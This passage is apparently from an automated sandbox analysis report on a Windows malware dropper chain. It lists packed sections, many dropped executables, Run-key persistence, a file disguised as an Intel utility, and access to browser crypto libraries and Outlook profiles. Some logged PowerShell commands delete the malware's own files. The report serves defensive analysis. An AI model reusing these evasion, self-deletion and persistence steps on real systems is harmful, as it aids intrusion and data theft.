                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: rtutils.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: mswsock.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: winhttp.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: iphlpapi.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: dhcpcsvc.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: winnsi.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: dnsapi.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: rasadhlp.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: fwpuclnt.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: secur32.dll
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                      Source: file.exeStatic file information: File size 2989568 > 1048576
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: file.exeStatic PE information: Raw size of uyzzfcwd is bigger than: 0x100000 < 0x2a8400
                      Source: Binary string: D:\a\_work\1\s\src\StoreInstaller\obj\Release\net472\StoreInstaller.pdb source: 4268204ace.exe, 0000000F.00000002.2742198429.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2742198429.0000000003CBA000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000000.2721445578.00000220D3472000.00000002.00000001.01000000.00000014.sdmp
                      Source: Binary string: D:\a\_work\1\s\src\StoreInstaller\obj\Release\net472\StoreInstaller.pdbSHA256\u source: 4268204ace.exe, 0000000F.00000002.2742198429.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2742198429.0000000003CBA000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000000.2721445578.00000220D3472000.00000002.00000001.01000000.00000014.sdmp
                      Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdb source: 4268204ace.exe, 0000000F.00000000.2555729362.00000000007D2000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdbdj~j pj_CorExeMainmscoree.dll source: 4268204ace.exe, 0000000F.00000000.2555729362.00000000007D2000.00000002.00000001.01000000.0000000C.sdmp

                      Data Obfuscation

                      barindex
                      Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.50000.0.unpack :EW;.rsrc:W;.idata :W;uyzzfcwd:EW;cnrltnzy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;uyzzfcwd:EW;cnrltnzy:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 1.2.skotes.exe.6f0000.0.unpack :EW;.rsrc:W;.idata :W;uyzzfcwd:EW;cnrltnzy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;uyzzfcwd:EW;cnrltnzy:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeUnpacked PE file: 57.2.77594b3442.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ztykcjub:EW;rrqhotlr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ztykcjub:EW;rrqhotlr:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                      Source: random[1].exe0.5.drStatic PE information: 0x94370F66 [Sun Oct 18 12:19:50 2048 UTC]
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_002166A8 GetCurrentProcess,GetProcessTimes,memset,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,fputs,11_2_002166A8
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                      Source: random[1].exe1.5.drStatic PE information: real checksum: 0x447b07 should be: 0x449f2f
                      Source: 7z.exe.7.drStatic PE information: real checksum: 0x0 should be: 0x7b29e
                      Source: random[2].exe0.5.drStatic PE information: real checksum: 0x1c072f should be: 0x1c1af0
                      Source: random[4].exe1.5.drStatic PE information: real checksum: 0x44d56e should be: 0x44fdb5
                      Source: random[4].exe.5.drStatic PE information: real checksum: 0xd9d82 should be: 0xdfd9a
                      Source: 5119130eb96345a8a13dc770d0f33571.exe.15.drStatic PE information: real checksum: 0x10c5c5 should be: 0x10b49f
                      Source: 9c2981f3e5.exe.5.drStatic PE information: real checksum: 0x447b07 should be: 0x449f2f
                      Source: d7884c562e.exe.5.drStatic PE information: real checksum: 0x44d56e should be: 0x44fdb5
                      Source: 7d28d37061cb43098969a37cf25a380a.exe.15.drStatic PE information: real checksum: 0x0 should be: 0x243ba
                      Source: random[3].exe0.5.drStatic PE information: real checksum: 0x0 should be: 0xc8597
                      Source: random[5].exe.5.drStatic PE information: real checksum: 0x1a555c should be: 0x15e8ab
                      Source: 513dad5c05.exe.5.drStatic PE information: real checksum: 0x2c742a should be: 0x2c4365
                      Source: 77594b3442.exe.5.drStatic PE information: real checksum: 0x1c072f should be: 0x1c1af0
                      Source: random[2].exe1.5.drStatic PE information: real checksum: 0x2bf0ab should be: 0x2c12d9
                      Source: 73c096c84a.exe.5.drStatic PE information: real checksum: 0x1a555c should be: 0x15e8ab
                      Source: skotes.exe.0.drStatic PE information: real checksum: 0x2e5189 should be: 0x2e3bb7
                      Source: 964c9facda.exe.5.drStatic PE information: real checksum: 0x1cfc32 should be: 0x1d33c1
                      Source: random[4].exe0.5.drStatic PE information: real checksum: 0x0 should be: 0x11353a
                      Source: 7z.dll.7.drStatic PE information: real checksum: 0x0 should be: 0x1a2c6b
                      Source: random[1].exe2.5.drStatic PE information: real checksum: 0x1da207 should be: 0x1cc4a9
                      Source: 4268204ace.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x14b59
                      Source: 164919d456.exe.5.drStatic PE information: real checksum: 0x0 should be: 0xc8597
                      Source: fcd2b0e3cd.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x11353a
                      Source: 0577f55121.exe.5.drStatic PE information: real checksum: 0x1da207 should be: 0x1cc4a9
                      Source: ce29828af5.exe.5.drStatic PE information: real checksum: 0x2bf0ab should be: 0x2c12d9
                      Source: file.exeStatic PE information: real checksum: 0x2e5189 should be: 0x2e3bb7
                      Source: random[3].exe.5.drStatic PE information: real checksum: 0x1cfc32 should be: 0x1d33c1
                      Source: random[2].exe2.5.drStatic PE information: real checksum: 0x2c742a should be: 0x2c4365
                      Source: random[1].exe0.5.drStatic PE information: real checksum: 0x0 should be: 0x14b59
                      Source: 9905c00c72.exe.5.drStatic PE information: real checksum: 0xd9d82 should be: 0xdfd9a
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name: .idata
                      Source: file.exeStatic PE information: section name: uyzzfcwd
                      Source: file.exeStatic PE information: section name: cnrltnzy
                      Source: file.exeStatic PE information: section name: .taggant
                      Source: skotes.exe.0.drStatic PE information: section name:
                      Source: skotes.exe.0.drStatic PE information: section name: .idata
                      Source: skotes.exe.0.drStatic PE information: section name: uyzzfcwd
                      Source: skotes.exe.0.drStatic PE information: section name: cnrltnzy
                      Source: skotes.exe.0.drStatic PE information: section name: .taggant
                      Source: 513dad5c05.exe.5.drStatic PE information: section name:
                      Source: 513dad5c05.exe.5.drStatic PE information: section name: .idata
                      Source: 513dad5c05.exe.5.drStatic PE information: section name: ifvqdref
                      Source: 513dad5c05.exe.5.drStatic PE information: section name: ulfvmwmt
                      Source: 513dad5c05.exe.5.drStatic PE information: section name: .taggant
                      Source: ce29828af5.exe.5.drStatic PE information: section name:
                      Source: ce29828af5.exe.5.drStatic PE information: section name: .idata
                      Source: ce29828af5.exe.5.drStatic PE information: section name: kiohytmd
                      Source: ce29828af5.exe.5.drStatic PE information: section name: gbzfitgk
                      Source: ce29828af5.exe.5.drStatic PE information: section name: .taggant
                      Source: random[3].exe.5.drStatic PE information: section name:
                      Source: random[3].exe.5.drStatic PE information: section name: .idata
                      Source: random[3].exe.5.drStatic PE information: section name:
                      Source: random[3].exe.5.drStatic PE information: section name: lzigcvvj
                      Source: random[3].exe.5.drStatic PE information: section name: pdsqmwos
                      Source: random[3].exe.5.drStatic PE information: section name: .taggant
                      Source: 964c9facda.exe.5.drStatic PE information: section name:
                      Source: 964c9facda.exe.5.drStatic PE information: section name: .idata
                      Source: 964c9facda.exe.5.drStatic PE information: section name:
                      Source: 964c9facda.exe.5.drStatic PE information: section name: lzigcvvj
                      Source: 964c9facda.exe.5.drStatic PE information: section name: pdsqmwos
                      Source: 964c9facda.exe.5.drStatic PE information: section name: .taggant
                      Source: random[4].exe1.5.drStatic PE information: section name:
                      Source: random[4].exe1.5.drStatic PE information: section name: .idata
                      Source: random[4].exe1.5.drStatic PE information: section name:
                      Source: random[4].exe1.5.drStatic PE information: section name: odlbdsvw
                      Source: random[4].exe1.5.drStatic PE information: section name: ivvnrpag
                      Source: random[4].exe1.5.drStatic PE information: section name: .taggant
                      Source: random[1].exe1.5.drStatic PE information: section name:
                      Source: random[1].exe1.5.drStatic PE information: section name: .idata
                      Source: random[1].exe1.5.drStatic PE information: section name:
                      Source: random[1].exe1.5.drStatic PE information: section name: hdwdyvma
                      Source: random[1].exe1.5.drStatic PE information: section name: sgdtbgtm
                      Source: random[1].exe1.5.drStatic PE information: section name: .taggant
                      Source: 9c2981f3e5.exe.5.drStatic PE information: section name:
                      Source: 9c2981f3e5.exe.5.drStatic PE information: section name: .idata
                      Source: 9c2981f3e5.exe.5.drStatic PE information: section name:
                      Source: 9c2981f3e5.exe.5.drStatic PE information: section name: hdwdyvma
                      Source: 9c2981f3e5.exe.5.drStatic PE information: section name: sgdtbgtm
                      Source: 9c2981f3e5.exe.5.drStatic PE information: section name: .taggant
                      Source: d7884c562e.exe.5.drStatic PE information: section name:
                      Source: d7884c562e.exe.5.drStatic PE information: section name: .idata
                      Source: d7884c562e.exe.5.drStatic PE information: section name:
                      Source: d7884c562e.exe.5.drStatic PE information: section name: odlbdsvw
                      Source: d7884c562e.exe.5.drStatic PE information: section name: ivvnrpag
                      Source: d7884c562e.exe.5.drStatic PE information: section name: .taggant
                      Source: random[5].exe.5.drStatic PE information: section name: .eh_fram
                      Source: 73c096c84a.exe.5.drStatic PE information: section name: .eh_fram
                      Source: random[1].exe2.5.drStatic PE information: section name:
                      Source: random[1].exe2.5.drStatic PE information: section name: .idata
                      Source: random[1].exe2.5.drStatic PE information: section name:
                      Source: random[1].exe2.5.drStatic PE information: section name: mptavxer
                      Source: random[1].exe2.5.drStatic PE information: section name: supuhgzh
                      Source: random[1].exe2.5.drStatic PE information: section name: .taggant
                      Source: 0577f55121.exe.5.drStatic PE information: section name:
                      Source: 0577f55121.exe.5.drStatic PE information: section name: .idata
                      Source: 0577f55121.exe.5.drStatic PE information: section name:
                      Source: 0577f55121.exe.5.drStatic PE information: section name: mptavxer
                      Source: 0577f55121.exe.5.drStatic PE information: section name: supuhgzh
                      Source: 0577f55121.exe.5.drStatic PE information: section name: .taggant
                      Source: random[2].exe0.5.drStatic PE information: section name:
                      Source: random[2].exe0.5.drStatic PE information: section name: .idata
                      Source: random[2].exe0.5.drStatic PE information: section name:
                      Source: random[2].exe0.5.drStatic PE information: section name: ztykcjub
                      Source: random[2].exe0.5.drStatic PE information: section name: rrqhotlr
                      Source: random[2].exe0.5.drStatic PE information: section name: .taggant
                      Source: 77594b3442.exe.5.drStatic PE information: section name:
                      Source: 77594b3442.exe.5.drStatic PE information: section name: .idata
                      Source: 77594b3442.exe.5.drStatic PE information: section name:
                      Source: 77594b3442.exe.5.drStatic PE information: section name: ztykcjub
                      Source: 77594b3442.exe.5.drStatic PE information: section name: rrqhotlr
                      Source: 77594b3442.exe.5.drStatic PE information: section name: .taggant
                      Source: random[2].exe1.5.drStatic PE information: section name:
                      Source: random[2].exe1.5.drStatic PE information: section name: .idata
                      Source: random[2].exe1.5.drStatic PE information: section name: kiohytmd
                      Source: random[2].exe1.5.drStatic PE information: section name: gbzfitgk
                      Source: random[2].exe1.5.drStatic PE information: section name: .taggant
                      Source: random[2].exe2.5.drStatic PE information: section name:
                      Source: random[2].exe2.5.drStatic PE information: section name: .idata
                      Source: random[2].exe2.5.drStatic PE information: section name: ifvqdref
                      Source: random[2].exe2.5.drStatic PE information: section name: ulfvmwmt
                      Source: random[2].exe2.5.drStatic PE information: section name: .taggant
                      Source: 7d28d37061cb43098969a37cf25a380a.exe.15.drStatic PE information: section name: .00cfg
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0006D91C push ecx; ret 0_2_0006D92F
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00061359 push es; ret 0_2_0006135A
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_0070D91C push ecx; ret 1_2_0070D92F
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001F676A push rcx; ret 11_2_001F676B
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_0378633D push eax; ret 40_2_03786351
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_07DB3D64 push FFFFFF8Bh; iretd 40_2_07DB3D6D
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeCode function: 44_2_00007FFD9B98D2A5 pushad ; iretd 44_2_00007FFD9B98D2A6
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeCode function: 44_2_00007FFD9BABA61C pushad ; ret 44_2_00007FFD9BABA634
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeCode function: 44_2_00007FFD9BABA5BC push eax; ret 44_2_00007FFD9BABA5D4
                      Source: file.exeStatic PE information: section name: entropy: 7.9890404804965165
                      Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.9890404804965165
                      Source: random[3].exe.5.drStatic PE information: section name: entropy: 7.979706188474013
                      Source: random[3].exe.5.drStatic PE information: section name: lzigcvvj entropy: 7.9541420583885305
                      Source: 964c9facda.exe.5.drStatic PE information: section name: entropy: 7.979706188474013
                      Source: 964c9facda.exe.5.drStatic PE information: section name: lzigcvvj entropy: 7.9541420583885305
                      Source: random[4].exe0.5.drStatic PE information: section name: .text entropy: 7.73440914387992
                      Source: fcd2b0e3cd.exe.5.drStatic PE information: section name: .text entropy: 7.73440914387992
                      Source: random[4].exe1.5.drStatic PE information: section name: odlbdsvw entropy: 7.954786025593838
                      Source: random[1].exe1.5.drStatic PE information: section name: hdwdyvma entropy: 7.9557608307799
                      Source: 9c2981f3e5.exe.5.drStatic PE information: section name: hdwdyvma entropy: 7.9557608307799
                      Source: d7884c562e.exe.5.drStatic PE information: section name: odlbdsvw entropy: 7.954786025593838
                      Source: random[1].exe2.5.drStatic PE information: section name: mptavxer entropy: 7.947493885557735
                      Source: 0577f55121.exe.5.drStatic PE information: section name: mptavxer entropy: 7.947493885557735
                      Source: random[2].exe0.5.drStatic PE information: section name: entropy: 7.9790031897630564
                      Source: random[2].exe0.5.drStatic PE information: section name: ztykcjub entropy: 7.953755320813844
                      Source: 77594b3442.exe.5.drStatic PE information: section name: entropy: 7.9790031897630564
                      Source: 77594b3442.exe.5.drStatic PE information: section name: ztykcjub entropy: 7.953755320813844

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\Users\user\Documents\CAAEBKEGHJ.exeJump to dropped file
                      Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeFile created: C:\Users\user\AppData\Local\Temp\1v1w92NeCw3SKGKedet\Y-Cleaner.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019039001\d7884c562e.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019040001\73c096c84a.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[4].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile created: C:\Users\user\AppData\Local\Temp\MCGXXRICH6C9X2RWLNL.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[4].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile created: C:\Users\user\AppData\Local\Temp\975RDI33VTLWGIQACCE.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeFile created: C:\Users\user\AppData\Local\Temp\1v1w92NeCw3SKGKedet\Bunifu_UI_v1.5.3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[5].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeFile created: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019038001\fcd2b0e3cd.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019037001\9905c00c72.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019034001\ce29828af5.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019036001\164919d456.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1019035001\964c9facda.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\Users\user\Documents\CAAEBKEGHJ.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeFile created: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]Jump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 77594b3442.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9d4ddc637a.exeJump to behavior
